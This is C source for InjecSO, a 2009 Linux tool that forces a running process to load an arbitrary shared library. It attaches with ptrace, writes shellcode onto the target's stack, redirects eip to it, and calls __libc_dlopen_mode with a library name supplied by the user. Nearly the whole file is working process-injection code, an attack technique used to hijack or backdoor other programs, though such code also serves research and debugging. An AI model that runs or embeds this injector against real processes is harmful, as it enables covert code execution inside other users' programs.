/**
 * \file injecso.c
 *
 * \brief InjecSO - Shared object injection into processes under Linux
 * \brief Main Program
 * \version 1.0
 *
 * \author Emilien Girault (Trance)
 * \author www.emiliengirault.fr - www.ghostsinthestack.org
 * \date 2009/02/13
 *
 */

#define VERSION "1.0"

#include <stdlib.h>
#include <stdio.h>
#include <libgen.h>
#include <string.h>
#include <sys/ptrace.h>

//Use <linux/user.h> on old Linux distributions
#include <sys/user.h>

//Delta between the end of shellcode and the old value of %eip.
//Experimentally, any value >=2 seems working
#define DELTA_SHELLCODE_EIP_BAK 4

//Import labels defined in shellcode.s
void shellcode_code(void);
void shellcode_code_end(void);


/**
 * \brief Check parameters
 * \param argc Argument count
 * \param argv Argument array
 * \param pid Pointer to the variable that will receive the pid
 * \param libname Pointer to the pointer that will receive the address of the string containing the name of the library to inject
 * \param dlopen_addr Pointer to the int that will receive the address of __libc_dlopen_mode()
 */
void check_params(int argc, char **argv, int *pid, char **libname, int *dlopen_addr){

  if(argc != 4){
    printf("InjecSO - Shared object injection into processes under Linux - v" VERSION "\n");
    printf("by Emilien Girault (Trance) - www.emiliengirault.fr - www.ghostsinthestack.org\n\n");
    printf("Usage: %s pid lib.so dlopen_addr\n", basename(argv[0]));
    printf("pid          - PID of the target process\n");
    printf("lib.so       - Absolute name of the library to inject\n");
    printf("dlopen_addr  - Address of __libc_dlopen_mode() function in target process.\n");
    printf("\nIt's recommended to use the provided script 'injecso.sh' in order to compute automatically the last parameter.\n");
    exit(0);
  }

  //Get the PID
  *pid = atoi(argv[1]);

  //Get the library name
  *libname = argv[2];

  //Get the address of __libc_dlopen_mode()
  *dlopen_addr = (int) strtoul(argv[3], NULL, 0);
}


/**
 * \brief Inject a shellcode into a process
 * \param pid Target PID
 * \param shellcode shellcode to inject
 * \param shellcode_size size of the shellcode
 */
void inject(int pid, char * shellcode, int shellcode_size){

  long res;
  struct user_regs_struct regs;
  char * addr_shellcode;
  int i;

  //Attach to the process
  printf("[+] Attaching...\n");
  res = ptrace(PTRACE_ATTACH, pid, NULL, NULL);
  if(res == -1){
    perror("Attaching");
  }

  //Wait for the process
  printf("[+] Waiting for process...\n");
  waitpid(pid, NULL, 0);

  //Set option for interrupted syscalls
  res = ptrace(PTRACE_SETOPTIONS, pid, NULL, PTRACE_O_TRACESYSGOOD);
  if(res == -1){
    perror("Setting ptrace option");
  }

  //Get the registers of the process
  res = ptrace(PTRACE_GETREGS, pid, NULL, &regs);
  if(res == -1){
    perror("Getting registers");
  }

#ifdef DEBUG
  printf("[DEBUG] Process registers before: eip = 0x%x, esp = 0x%x\n", regs.eip, regs.esp);
#endif

  //Compute the address where the shellcode will be copied
  //We keep 4 bytes for old eip and a delta between this and the end of the shellcode
  addr_shellcode = (char *) regs.esp - shellcode_size - DELTA_SHELLCODE_EIP_BAK - 4;

  //Save eip on the stack (esp orig - 4)
#ifdef DEBUG
  printf("[DEBUG] esp-4 = 0x%x\n", regs.esp-4);
#endif
  res = ptrace(PTRACE_POKEDATA, pid, regs.esp-4, regs.eip);
  if(res == -1){
    perror("Saving eip");
  }

  //Copy shellcode
  printf("[+] Copying shellcode to 0x%x...\n", (int) addr_shellcode);
  for(i = 0; i < shellcode_size/4; i++){
    res = ptrace(PTRACE_POKEDATA, pid, &addr_shellcode[i*4], (int) *((int*) &shellcode[i*4])); //Copy 4 bytes each time
    if(res == -1){
      perror("Copying shellcode");
    }
  }
  if((shellcode_size % 4) != 0){
    res = ptrace(PTRACE_POKEDATA, pid, &addr_shellcode[i*4], (int) *((int*) &shellcode[i*4])); //Copy the last 3- bytes if necessary
    if(res == -1){
      perror("Copying shellcode");
    }
  }


  //Make eip and esp point to the shellcode
  printf("[+] Setting eip and esp...\n");
  regs.eip = (int) addr_shellcode+2; //just to be sure that is in the middle of nops
  regs.esp = (int) addr_shellcode;
  res = ptrace(PTRACE_SETREGS, pid, NULL, &regs);
  if(res == -1){
    perror("Setting eip and esp");
  }

  //printf("[DEBUG] Process registers after: eip = 0x%x, esp = 0x%x\n", regs.eip, regs.esp);

  //Detach from the process
  printf("[+] Detaching...\n");
  res = ptrace(PTRACE_DETACH, pid, NULL, NULL);
  if(res == -1){
    perror("Detaching");
  }

}



/**
 * \brief Main program
 * \param argc Argument count
 * \param argv Argument array
 */
int main(int argc, char **argv){
  char * shellcode;
  int shellcode_size, libname_size;
  char * ptr;
  int i;
  int pid;
  char * libname;
  int dlopen_addr;

  //Check parameters
  check_params(argc, argv, &pid, &libname, &dlopen_addr);

  //Compute the size of the library name and deduce the shellcode size
  libname_size = strlen(libname);
  shellcode_size = (char *) shellcode_code_end - (char *) shellcode_code + libname_size + 1;

  //Allocate the shellcode buffer
  shellcode = malloc(shellcode_size);

  //Copy the shellcode code into the buffer
  for(i = 0, ptr = (char *) shellcode_code; ptr != (char *) shellcode_code_end; ptr++, i++){
    shellcode[i] = *ptr;
  }

  //Copy the library name at the end of the shellcode
  for(ptr = libname; *ptr != 0; ptr++, i++){
    shellcode[i] = *ptr;
  }

  //Patch the shellcode by inserting the real address of __libc_dlopen_mode (replace 0x11111111 by dlopen_addr)
  *((int *) &(shellcode[12])) = dlopen_addr;

  //Patch the shellcode to include its own size
  *((int *) &(shellcode[27])) = shellcode_size + DELTA_SHELLCODE_EIP_BAK;

#ifdef DEBUG
  //Print the shellcode
  printf("[DEBUG] char shellcode[] = \n\"");
  for(i = 0; i < shellcode_size; i++){
    printf("\\x%.2x", shellcode[i] & 0xff);
    fflush(stdout);
    ptr++;
  }
  printf("\";\n");
#endif

  //Inject!
  inject(pid, shellcode, shellcode_size);

  //Unallocate the shellcode buffer
  free(shellcode);
}